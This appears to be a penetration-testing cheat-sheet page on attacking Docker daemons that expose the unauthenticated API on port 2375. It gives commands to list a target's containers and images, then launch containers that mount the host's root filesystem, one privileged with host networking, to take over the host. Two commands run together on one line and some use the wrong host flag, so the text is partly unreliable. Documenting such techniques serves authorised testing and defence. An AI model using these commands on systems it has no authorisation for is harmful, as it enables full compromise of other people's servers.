2375 - Docker
Last updated
Was this helpful?
Last updated
Was this helpful?
Was this helpful?
Run docker commands against a docker host to verify if it accepts unauthenticated communication or not.
If it allows unauthenticated communication you can most likely own the host device by creating a new container and mounting the root filesystem.
docker -h 10.10.10.10:2375 container ls
docker -h 10.10.10.10:2375 images lsdocker -H 10.10.10.10:2375 run --rm -it -v /:/mnt victim.azurecr.io/httpd:alpine sh
docker -H 10.10.10.10:2375 run --rm -it --privileged --net=host -v /:/mnt alpine sh